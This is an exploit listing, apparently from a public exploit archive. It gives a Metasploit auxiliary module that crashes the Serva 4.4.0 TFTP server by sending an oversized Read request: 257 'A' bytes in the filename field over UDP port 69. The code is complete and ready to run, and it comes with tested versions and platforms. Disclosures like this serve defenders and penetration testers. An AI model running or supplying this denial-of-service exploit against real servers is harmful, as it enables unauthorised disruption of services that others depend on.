Serva 4.4.0 TFTP Remote Buffer Overflow

The Serva TFTP server version 4.4.0 can be brought down by sending a special Read request.


MD5 | 75523ccfe4170ca41342bbd1293163fb

# Exploit Title: Serva 4.4.0 TFTP Server Remote Buffer Overflow (Metasploit)
# Date: 2021-11-23
# Exploit Author: Yehia Elghaly
# Vendor Homepage: https://www.vercot.com/
# Software Link : https://www.vercot.com/~serva/download/Serva_Community_v4.4.0-21081411.zip
# Tested Version: 4.4.0
# Tested on: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Dos
Rank = ExcellentRanking

def initialize(info = {})
super(update_info(info,
'Name' => 'Serva 4.4.0 TFTP Remote Buffer Overflow',
'Description' => %q{
The Serva TFTP server version 4.4.0 can be
brought down by sending a special Read request.
},
'Author' => 'Yehia Elghaly',
'License' => MSF_LICENSE,
'DisclosureDate' => '2021-11-23'))

register_options([Opt::RPORT(69)])
end

def run
connect_udp
print_status("Sending Read request...")
sploit = "\x00\x01"
sploit += "A" * 257
sploit += "\x00"
sploit += "netascii"
sploit += "\x00"
udp_sock.put(sploit)
disconnect_udp
end
end

Related Posts